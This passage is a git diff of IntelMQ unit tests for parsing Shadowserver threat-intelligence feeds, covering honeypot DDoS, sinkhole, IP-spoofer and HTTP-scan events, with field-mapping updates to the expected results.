+   'extra.tag' : 'ssl,vpn',
+   'protocol.transport' : 'tcp',
+   'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
+                                     EXAMPLE_LINES[3]])),
+   'source.asn' : 4181,
+   'source.geolocation.cc' : 'US',
+   'source.geolocation.city' : 'MILWAUKEE',
+   'source.geolocation.region' : 'WISCONSIN',
+   'source.ip' : '96.60.0.0',
+   'source.port' : 10443,
+   'source.reverse_dns' : '96-60-66-218.example.com',
+   'time.observation' : '2022-01-07T00:00:00+00:00',
+   'time.source' : '2022-01-10T00:01:42+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_drone_brute_force.py b/intelmq/tests/bots/parsers/shadowserver/test_drone_brute_force.py
deleted file mode 100644
index 167f52b20..000000000
--- a/intelmq/tests/bots/parsers/shadowserver/test_drone_brute_force.py
+++ /dev/null
@@ -1,73 +0,0 @@
-# SPDX-FileCopyrightText: 2018 Sebastian Wagner
-#
-# SPDX-License-Identifier: AGPL-3.0-or-later
-
-# -*- coding: utf-8 -*-
-
-import os
-import unittest
-
-import intelmq.lib.test as test
-import intelmq.lib.utils as utils
-from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
-
-with open(os.path.join(os.path.dirname(__file__), 'testdata/drone_brute_force.csv')) as handle:
-    EXAMPLE_FILE = handle.read()
-EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
-
-EXAMPLE_REPORT = {'feed.name': 'Drone Brute Force',
-                  "raw": utils.base64_encode(EXAMPLE_FILE),
-                  "__type": "Report",
-                  "time.observation": "2015-01-01T00:00:00+00:00",
-                  "extra.file_name": "2019-01-01-drone_brute_force-test-test.csv"
-                  }
-EVENTS = [{'__type': 'Event',
-           'classification.identifier': 'ssh',
-           'classification.taxonomy': 'intrusion-attempts',
-           'classification.type': 'brute-force',
-           'extra.client_version': 'SSH-2.0-libssh2_1.7.0',
-           'destination.asn': 65536,
-           'destination.geolocation.cc': 'CA',
-           'destination.ip': '198.51.100.196',
-           'destination.port': 22,
-           'extra.destination.naics': 518210,
-           'extra.destination.sector': 'Information Technology',
-           'extra.destination.sic': 737401,
-           'extra.end_time': '2018-04-07T03:02:19.143501+00:00',
-           'extra.password': 'password',
-           'extra.public_source': 'SISSDEN',
-           'extra.start_time': '2018-04-07T03:02:15.951205Z',
-           'destination.account': 'alex',
-           'protocol.application': 'ssh',
-           'feed.name': 'Drone Brute Force',
-           'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
-                                                 EXAMPLE_LINES[1]])),
-           'source.asn': 64496,
-           'source.geolocation.cc': 'AT',
-           'source.geolocation.city': 'WIEN',
-           'source.geolocation.region': 'WIEN',
-           'source.ip': '198.51.100.169',
-           'source.port': 38880,
-           'time.source': '2018-04-07T03:02:15+00:00'},
-          ]
-
-
-class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
-    """
-    A TestCase for a ShadowserverParserBot.
-    """
-
-    @classmethod
-    def set_bot(cls):
-        cls.bot_reference = ShadowserverParserBot
-        cls.default_input_message = EXAMPLE_REPORT
-
-    def test_event(self):
-        """ Test if correct Event has been produced. """
-        self.run_bot()
-        for i, EVENT in enumerate(EVENTS):
-            self.assertMessageEqual(i, EVENT)
-
-
-if __name__ == '__main__':  # pragma: no cover
-    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_event4_honeypot_darknet.py b/intelmq/tests/bots/parsers/shadowserver/test_event4_honeypot_darknet.py
index 659acad85..1d020f473 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_event4_honeypot_darknet.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_event4_honeypot_darknet.py
@@ -28,7 +28,8 @@
            'classification.type': 'other',
            'destination.port': 23,
            'extra.source.naics': 518210,
-           'extra.protocol': 'tcp',
+           'extra.tag': 'mirai',
+           'protocol.transport': 'tcp',
            'feed.name': 'ShadowServer Darknet',
            'malware.name': 'mirai',
            'source.asn': 9829,
@@ -46,8 +47,9 @@
            'classification.taxonomy': 'other',
            'classification.type': 'other',
            'destination.port': 23,
-           'extra.protocol': 'tcp',
+           'protocol.transport': 'tcp',
            'extra.source.naics': 517311,
+           'extra.tag': 'mirai',
            'feed.name': 'ShadowServer Darknet',
            'malware.name': 'mirai',
            'source.asn': 4766,
@@ -64,8 +66,9 @@
            'classification.identifier': 'mirai',
            'classification.taxonomy': 'other',
            'classification.type': 'other',
+           'extra.tag': 'mirai',
            'destination.port': 23,
-           'extra.protocol': 'tcp',
+           'protocol.transport': 'tcp',
            'feed.name': 'ShadowServer Darknet',
            'malware.name': 'mirai',
            'source.asn': 266915,
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_event4_honeypot_ddos.py b/intelmq/tests/bots/parsers/shadowserver/test_event4_honeypot_ddos.py
new file mode 100644
index 000000000..c62a610fa
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_event4_honeypot_ddos.py
@@ -0,0 +1,148 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/event4_honeypot_ddos.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Honeypot DDoS Events',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2010-02-10T00:00:00+00:00",
+                  "extra.file_name": "2010-02-10-event4_honeypot_ddos-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'honeypot-ddos',
+   'classification.taxonomy' : 'availability',
+   'classification.type' : 'ddos',
+   'destination.asn' : 65534,
+   'destination.geolocation.cc' : 'ZZ',
+   'destination.geolocation.city' : 'City',
+   'destination.geolocation.region' : 'Region',
+   'destination.ip' : '172.16.0.1',
+   'destination.port' : 88,
+   'destination.reverse_dns' : 'node01.example.net',
+   'extra.application' : 'mirai',
+   'extra.attack' : 'atk10',
+   'extra.dst_netmask' : '32',
+   'extra.dst_network' : '121.12.110.28/32',
+   'extra.duration' : 30,
+   'extra.family' : 'mirai',
+   'extra.packet_length' : 1440,
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.tag' : 'mirai',
+   'feed.name' : 'Honeypot DDoS Events',
+   'malware.name' : 'ddos',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.1',
+   'source.port' : 61234,
+   'source.reverse_dns' : 'node01.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:00+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'honeypot-ddos',
+   'classification.taxonomy' : 'availability',
+   'classification.type' : 'ddos',
+   'destination.asn' : 65534,
+   'destination.geolocation.cc' : 'ZZ',
+   'destination.geolocation.city' : 'City',
+   'destination.geolocation.region' : 'Region',
+   'destination.ip' : '172.16.0.2',
+   'destination.port' : 80,
+   'destination.reverse_dns' : 'node02.example.net',
+   'extra.application' : 'mirai',
+   'extra.attack' : 'atk10',
+   'extra.dst_netmask' : '32',
+   'extra.dst_network' : '180.97.183.94/32',
+   'extra.duration' : 30,
+   'extra.family' : 'mirai',
+   'extra.packet_length' : 1440,
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.tag' : 'mirai',
+   'feed.name' : 'Honeypot DDoS Events',
+   'malware.name' : 'ddos',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.2',
+   'source.port' : 61234,
+   'source.reverse_dns' : 'node02.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:01+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'honeypot-ddos',
+   'classification.taxonomy' : 'availability',
+   'classification.type' : 'ddos',
+   'destination.asn' : 65534,
+   'destination.geolocation.cc' : 'ZZ',
+   'destination.geolocation.city' : 'City',
+   'destination.geolocation.region' : 'Region',
+   'destination.ip' : '172.16.0.3',
+   'destination.reverse_dns' : 'node03.example.net',
+   'extra.application' : 'mirai',
+   'extra.attack' : 'atk7',
+   'extra.destination.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.dst_netmask' : '32',
+   'extra.dst_network' : '104.237.138.135/32',
+   'extra.duration' : 10,
+   'extra.family' : 'mirai',
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.tag' : 'mirai',
+   'feed.name' : 'Honeypot DDoS Events',
+   'malware.name' : 'ddos',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.3',
+   'source.port' : 6379,
+   'source.reverse_dns' : 'node03.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:02+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_event4_honeypot_ddos_target.py b/intelmq/tests/bots/parsers/shadowserver/test_event4_honeypot_ddos_target.py
new file mode 100644
index 000000000..f379d1c88
--- /dev/null
+++ b/intelmq/tests/bots/parsers/shadowserver/test_event4_honeypot_ddos_target.py
@@ -0,0 +1,150 @@
+# SPDX-FileCopyrightText: 2022 Shadowserver Foundation
+#
+# SPDX-License-Identifier: AGPL-3.0-or-later
+
+# -*- coding: utf-8 -*-
+
+import os
+import unittest
+
+import intelmq.lib.test as test
+import intelmq.lib.utils as utils
+from intelmq.bots.parsers.shadowserver.parser import ShadowserverParserBot
+
+with open(os.path.join(os.path.dirname(__file__),
+                       'testdata/event4_honeypot_ddos_target.csv')) as handle:
+    EXAMPLE_FILE = handle.read()
+EXAMPLE_LINES = EXAMPLE_FILE.splitlines()
+
+EXAMPLE_REPORT = {'feed.name': 'Honeypot DDoS Target Events',
+                  "raw": utils.base64_encode(EXAMPLE_FILE),
+                  "__type": "Report",
+                  "time.observation": "2010-02-10T00:00:00+00:00",
+                  "extra.file_name": "2010-02-10-event4_honeypot_ddos_target-test.csv",
+                  }
+EVENTS = [
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'honeypot-ddos-target',
+   'classification.taxonomy' : 'availability',
+   'classification.type' : 'ddos',
+   'destination.asn' : 65534,
+   'destination.geolocation.cc' : 'ZZ',
+   'destination.geolocation.city' : 'City',
+   'destination.geolocation.region' : 'Region',
+   'destination.ip' : '172.16.0.1',
+   'destination.port' : 80,
+   'destination.reverse_dns' : 'node01.example.net',
+   'extra.application' : 'mirai',
+   'extra.attack' : 'atk0',
+   'extra.dst_netmask' : '32',
+   'extra.dst_network' : '115.238.198.85/32',
+   'extra.duration' : 30,
+   'extra.family' : 'mirai',
+   'extra.packet_length' : 1440,
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.tag' : 'mirai',
+   'feed.name' : 'Honeypot DDoS Target Events',
+   'malware.name' : 'ddos',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[1]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.1',
+   'source.port' : 61234,
+   'source.reverse_dns' : 'node01.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:00+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'honeypot-ddos-target',
+   'classification.taxonomy' : 'availability',
+   'classification.type' : 'ddos',
+   'destination.asn' : 65534,
+   'destination.geolocation.cc' : 'ZZ',
+   'destination.geolocation.city' : 'City',
+   'destination.geolocation.region' : 'Region',
+   'destination.ip' : '172.16.0.2',
+   'destination.port' : 43437,
+   'destination.reverse_dns' : 'node02.example.net',
+   'extra.application' : 'mirai',
+   'extra.attack' : 'atk0',
+   'extra.destination.sector' : 'Information',
+   'extra.dst_netmask' : '32',
+   'extra.dst_network' : '52.184.50.250/32',
+   'extra.duration' : 30,
+   'extra.family' : 'mirai',
+   'extra.packet_length' : 1440,
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.tag' : 'mirai',
+   'feed.name' : 'Honeypot DDoS Target Events',
+   'malware.name' : 'ddos',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[2]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.2',
+   'source.port' : 61234,
+   'source.reverse_dns' : 'node02.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:01+00:00'
+},
+{
+   '__type' : 'Event',
+   'classification.identifier' : 'honeypot-ddos-target',
+   'classification.taxonomy' : 'availability',
+   'classification.type' : 'ddos',
+   'destination.asn' : 65534,
+   'destination.geolocation.cc' : 'ZZ',
+   'destination.geolocation.city' : 'City',
+   'destination.geolocation.region' : 'Region',
+   'destination.ip' : '172.16.0.3',
+   'destination.port' : 80,
+   'destination.reverse_dns' : 'node03.example.net',
+   'extra.application' : 'mirai',
+   'extra.attack' : 'atk10',
+   'extra.dst_netmask' : '32',
+   'extra.dst_network' : '211.99.102.216/32',
+   'extra.duration' : 30,
+   'extra.family' : 'mirai',
+   'extra.packet_length' : 1440,
+   'extra.source.sector' : 'Communications, Service Provider, and Hosting Service',
+   'extra.tag' : 'mirai',
+   'feed.name' : 'Honeypot DDoS Target Events',
+   'malware.name' : 'ddos',
+   'raw' : utils.base64_encode('\n'.join([EXAMPLE_LINES[0], EXAMPLE_LINES[3]])),
+   'source.asn' : 64512,
+   'source.geolocation.cc' : 'ZZ',
+   'source.geolocation.city' : 'City',
+   'source.geolocation.region' : 'Region',
+   'source.ip' : '192.168.0.3',
+   'source.port' : 61234,
+   'source.reverse_dns' : 'node03.example.com',
+   'time.observation' : '2010-02-10T00:00:00+00:00',
+   'time.source' : '2010-02-10T00:00:02+00:00'
+}
+]
+
+
+class TestShadowserverParserBot(test.BotTestCase, unittest.TestCase):
+    """
+    A TestCase for a ShadowserverParserBot.
+    """
+
+    @classmethod
+    def set_bot(cls):
+        cls.bot_reference = ShadowserverParserBot
+        cls.default_input_message = EXAMPLE_REPORT
+
+    def test_event(self):
+        """ Test if correct Event has been produced. """
+        self.run_bot()
+        for i, EVENT in enumerate(EVENTS):
+            self.assertMessageEqual(i, EVENT)
+
+
+if __name__ == '__main__':  # pragma: no cover
+    unittest.main()
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_event4_honeypot_http_scan.py b/intelmq/tests/bots/parsers/shadowserver/test_event4_honeypot_http_scan.py
index 9c10e3b64..bcf268ba7 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_event4_honeypot_http_scan.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_event4_honeypot_http_scan.py
@@ -26,8 +26,8 @@
 EVENTS = [{'__type': 'Event',
            'feed.name': 'Honeypot-HTTP-Scan',
            'classification.identifier': 'honeypot-http-scan',
-           'classification.taxonomy': 'other',
-           'classification.type': 'other',
+           'classification.taxonomy': 'information-gathering',
+           'classification.type': 'scanner',
            'destination.asn': 5678,
            'destination.geolocation.cc': 'UK',
            'destination.geolocation.city': 'MAIDENHEAD',
@@ -36,14 +36,14 @@
            'destination.port': 80,
            'extra.http_url': '/js/ueditor/wwwroot/way-board.cgi',
            'extra.destination.naics': 518210,
-           'extra.protocol': 'tcp',
+           'protocol.transport': 'tcp',
+           'protocol.application': 'http',
            'extra.public_source': 'CAPRICA-EU',
            'extra.request_raw': 'R0VUIC9qcy91ZWRpdG9yL3d3d3Jvb3Qvd2F5LWJvYXJkLmNnaSBIVFRQLzEuMHJuQWNjZXB0OiB0ZXh0L2h0bWwsYXBwbGljYXRpb24veGh0bWwreG1sLGFwcGxpY2F0aW9uL3htbDtxPTAuOSwqLyo7cT0wLjhybkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZXJuQWNjZXB0LUxhbmd1YWdlOiBlbi1VUyxlbjtxPTAuNXJuQ29ubmVjdGlvbjogY2xvc2VybkRudDogMXJuSG9zdDogMTA5Ljg3LjY1LjQzcm5PcmlnaW46IGh0dHA6Ly8xMDkuODcuNjUuNDNyblJlZmVyZXI6IGh0dHA6Ly8xMDkuODcuNjUuNDMvcm5Vc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA2LjE7IFdPVzY0KSBBcHBsZVdlYktpdC81MzcuMzYgKEtIVE1MLCBsaWtlIEdlY2tvKSBDaHJvbWUvNTMuMC4yNzg1LjEwNCBTYWZhcmkvNTM3LjM2IENvcmUvMS41My4zMDg0LjQwMCBRUUJyb3dzZXIvOS42LjExMzQ2LjQwMA==',
            'extra.source.naics': 518210,
            'extra.source.sector': 'Communications, Service Provider, and Hosting Service',
            'extra.version': '3.1.3-dev',
            'malware.name': 'http-scan',
-           'protocol.application': 'http',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[1]])),
            'source.asn': 1234,
@@ -58,8 +58,8 @@
           {'__type': 'Event',
            'feed.name': 'Honeypot-HTTP-Scan',
            'classification.identifier': 'honeypot-http-scan',
-           'classification.taxonomy': 'other',
-           'classification.type': 'other',
+           'classification.taxonomy': 'information-gathering',
+           'classification.type': 'scanner',
            'destination.asn': 23456,
            'destination.geolocation.cc': 'UA',
            'destination.geolocation.city': 'KHARKIV',
@@ -68,13 +68,13 @@
            'destination.port': 8080,
            'extra.http_url': '/',
            'extra.method': 'GET',
-           'extra.protocol': 'tcp',
+           'protocol.transport': 'tcp',
+           'protocol.application': 'http',
            'extra.public_source': 'CAPRICA-EU',
            'extra.request_raw': 'R0VUIC8gSFRUUC8xLjENCkhvc3Q6IDgyLjQxLjIwLjEwOjgwODANCkFjY2VwdDogdGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhdGlvbi94bWw7cT0wLjksKi8qO3E9MC44DQpBY2NlcHQtRW5jb2Rpbmc6IGRlZmxhdGUsIGd6aXAsIGlkZW50aXR5DQpBY2NlcHQtTGFuZ3VhZ2U6IGVuLVVTO3E9MC42LGVuO3E9MC40DQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMCAoV2luZG93cyBOVCA1LjE7IHJ2OjkuMC4xKSBHZWNrby8yMDEwMDEwMSBGaXJlZm94LzkuMC4xDQoNCg==',
            'extra.url_scheme': 'http',
            'extra.user_agent': 'Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1',
            'malware.name': 'http-scan',
-           'protocol.application': 'http',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[2]])),
            'source.asn': 12345,
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_event4_ip_spoofer.py b/intelmq/tests/bots/parsers/shadowserver/test_event4_ip_spoofer.py
index e993ea534..d21fb10c5 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_event4_ip_spoofer.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_event4_ip_spoofer.py
@@ -36,12 +36,13 @@
         "source.network": "98.191.250.0/24",
         "source.reverse_dns": 'ip-98.191.250.0.atlinkservices.com',
         "extra.routedspoof": "received",
-        "extra.session": 1112907,
+        "extra.session": '1112907',
         "extra.nat": True,
         "extra.public_source": "caida",
         "extra.source.naics": 517311,
         "extra.version": 'ipv4',
         "protocol.transport": 'tcp',
+        "extra.infection": 'ip-spoofer',
 
         "classification.identifier": "ip-spoofer",
         "classification.taxonomy": "fraud",
@@ -63,11 +64,12 @@
         "source.geolocation.city": "NOVA IGUACU",
         "source.network": "191.7.16.0/24",
         "extra.routedspoof": "received",
-        "extra.session": 1112914,
+        "extra.session": '1112914',
         "extra.nat": False,
         "extra.public_source": "caida",
         "extra.version": 'ipv4',
         "protocol.transport": 'tcp',
+        "extra.infection": 'ip-spoofer',
 
         "classification.identifier": "ip-spoofer",
         "classification.taxonomy": "fraud",
@@ -89,11 +91,12 @@
         "source.geolocation.city": "DHAKA",
         "source.network": "202.53.160.0/24",
         "extra.routedspoof": "received",
-        "extra.session": 1112931,
+        "extra.session": '1112931',
         "extra.nat": True,
         "extra.public_source": "caida",
         "extra.version": 'ipv4',
         "protocol.transport": 'tcp',
+        "extra.infection": 'ip-spoofer',
 
         "classification.identifier": "ip-spoofer",
         "classification.taxonomy": "fraud",
@@ -115,11 +118,12 @@
         "source.geolocation.city": "BRISBANE",
         "source.network": "87.121.75.0/24",
         "extra.routedspoof": "received",
-        "extra.session": 1112953,
+        "extra.session": '1112953',
         "extra.nat": True,
         "extra.public_source": "caida",
         "extra.version": 'ipv4',
         "protocol.transport": 'tcp',
+        "extra.infection": 'ip-spoofer',
 
         "classification.identifier": "ip-spoofer",
         "classification.taxonomy": "fraud",
@@ -142,11 +146,12 @@
         "source.geolocation.region": 'COAHUILA',
         "source.reverse_dns": 'ip-189-201-194-0.slw.spectro.mx',
         "extra.routedspoof": "received",
-        "extra.session": 1113015,
+        "extra.session": '1113015',
         "extra.nat": True,
         "extra.public_source": "caida",
         "extra.version": 'ipv4',
         "protocol.transport": 'tcp',
+        "extra.infection": 'ip-spoofer',
 
         "classification.identifier": "ip-spoofer",
         "classification.taxonomy": "fraud",
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_event4_microsoft_sinkhole.py b/intelmq/tests/bots/parsers/shadowserver/test_event4_microsoft_sinkhole.py
index 76f636852..f008fd18e 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_event4_microsoft_sinkhole.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_event4_microsoft_sinkhole.py
@@ -33,11 +33,14 @@
            'destination.ip': '168.63.134.179',
            'destination.port': 16464,
            'extra.destination.naics': 334111,
+           'extra.tag': 'b68-zeroaccess-2-32bit',
+           'extra.infection': 'b68-zeroaccess-2-32bit',
            'extra.destination.sector': 'Information',
            'extra.public_source': 'MSDCU',
            'extra.source.naics': 517311,
+           'extra.tag': 'b68-zeroaccess-2-32bit',
            'feed.name': 'ShadowServer Microsoft Sinkhole',
-           'malware.name': 'b68-zeroaccess-2-32bit',
+           'malware.name': 'zeroaccess',
            'protocol.transport': 'tcp',
            'source.asn': 7303,
            'source.geolocation.cc': 'AR',
@@ -60,12 +63,14 @@
            'destination.ip': '52.169.3.4',
            'destination.port': 16464,
            'extra.destination.naics': 334111,
+           'extra.tag': 'b68-zeroaccess-2-32bit',
+           'extra.infection': 'b68-zeroaccess-2-32bit',
            'extra.destination.sector': 'Information',
            'extra.public_source': 'MSDCU',
            'extra.source.naics': 517311,
            'extra.source.sector': 'Communications, Service Provider, and Hosting Service',
            'feed.name': 'ShadowServer Microsoft Sinkhole',
-           'malware.name': 'b68-zeroaccess-2-32bit',
+           'malware.name': 'zeroaccess',
            'protocol.transport': 'tcp',
            'source.asn': 5769,
            'source.geolocation.cc': 'CA',
@@ -87,12 +92,14 @@
            'destination.geolocation.region': 'HONG KONG',
            'destination.ip': '168.63.134.179',
            'destination.port': 16464,
+           'extra.tag': 'b68-zeroaccess-2-32bit',
+           'extra.infection': 'b68-zeroaccess-2-32bit',
            'extra.destination.naics': 334111,
            'extra.destination.sector': 'Information',
            'extra.public_source': 'MSDCU',
            'extra.source.naics': 517311,
            'feed.name': 'ShadowServer Microsoft Sinkhole',
-           'malware.name': 'b68-zeroaccess-2-32bit',
+           'malware.name': 'zeroaccess',
            'protocol.transport': 'tcp',
            'source.asn': 8151,
            'source.geolocation.cc': 'MX',
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_event4_microsoft_sinkhole_http.py b/intelmq/tests/bots/parsers/shadowserver/test_event4_microsoft_sinkhole_http.py
index e2f0f8a6f..2f8c3d8e2 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_event4_microsoft_sinkhole_http.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_event4_microsoft_sinkhole_http.py
@@ -37,8 +37,10 @@
            'extra.destination.naics': 334111,
            'extra.destination.sector': 'Information',
            'extra.public_source': 'MSDCU',
-           'malware.name': 'necurs',
+           'extra.infection': 'necurs',
+           'extra.tag': 'necurs',
            'protocol.application': 'http',
+           'malware.name': 'necurs',
            'protocol.transport': 'tcp',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[1]])),
@@ -63,6 +65,9 @@
            'destination.ip': '204.95.99.204',
            'destination.port': 443,
            'destination.url': 'http://3fo8jrthz3y.rgk.cc/index.php',
+           'protocol.application': 'http',
+           'extra.infection': 'caphaw',
+           'extra.tag': 'caphaw',
            'extra.destination.naics': 334111,
            'extra.destination.sector': 'Information',
            'extra.http_agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.0.6103)',
@@ -70,7 +75,6 @@
            'extra.public_source': 'MSDCU',
            'extra.source.naics': 517312,
            'malware.name': 'caphaw',
-           'protocol.application': 'http',
            'protocol.transport': 'tcp',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[2]])),
@@ -94,12 +98,14 @@
            'destination.ip': '40.121.206.97',
            'destination.port': 80,
            'destination.url': 'http://40.121.206.97/locator.php',
+           'protocol.application': 'http',
+           'extra.tag': 'necurs',
+           'extra.infection': 'necurs',
            'extra.destination.naics': 334111,
            'extra.destination.sector': 'Information',
            'extra.public_source': 'MSDCU',
            'extra.source.naics': 517311,
            'malware.name': 'necurs',
-           'protocol.application': 'http',
            'protocol.transport': 'tcp',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[3]])),
@@ -127,6 +133,8 @@
            'extra.destination.sector': 'Information',
            'extra.public_source': 'MSDCU',
            'malware.name': 'necurs',
+           'extra.tag': 'necurs',
+           'extra.infection': 'necurs',
            'protocol.application': 'http',
            'protocol.transport': 'tcp',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
@@ -158,6 +166,8 @@
            'extra.source.sector': 'Communications, Service Provider, and Hosting Service',
            'malware.name': 'necurs',
            'protocol.application': 'http',
+           'extra.tag': 'necurs',
+           'extra.infection': 'necurs',
            'protocol.transport': 'tcp',
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[5]])),
diff --git a/intelmq/tests/bots/parsers/shadowserver/test_event4_sinkhole.py b/intelmq/tests/bots/parsers/shadowserver/test_event4_sinkhole.py
index c3abb09bd..2bb8aa698 100644
--- a/intelmq/tests/bots/parsers/shadowserver/test_event4_sinkhole.py
+++ b/intelmq/tests/bots/parsers/shadowserver/test_event4_sinkhole.py
@@ -23,6 +23,7 @@
                   "extra.file_name": "2019-01-01-event4_sinkhole.csv",
                   }
 EVENTS = [{'__type': 'Event',
+           'classification.identifier': 'victorygate.b',
            'classification.taxonomy': 'malicious-code',
            'classification.type': 'infected-system',
            'destination.asn': 28753,
@@ -36,6 +37,7 @@
            'extra.public_source': 'eset',
            'feed.name': 'ShadowServer Sinkhole',
            'malware.name': 'victorygate.b',
+           'extra.infection': 'victorygate.b',
            'protocol.transport': 'tcp',
            'source.asn': 12252,
            'source.geolocation.cc': 'PE',
@@ -47,58 +49,6 @@
            'raw': utils.base64_encode('\n'.join([EXAMPLE_LINES[0],
                                                  EXAMPLE_LINES[1]])),
            },
-          {'__type': 'Event',
-           'classification.identifier': 'b68-zeroaccess-2-32bit',
-           'classification.taxonomy': 'malicious-code',
-           'classification.type': 'infected-system',
-           'destination.asn': 8075,
-           'destination.geolocation.cc': 'SG',
-           'destination.geolocation.city': 'SINGAPORE',
-           'destination.geolocation.region': 'CENTRAL',
-           'destination.ip': '137.116.3.4',
-           'destination.port': 16464,
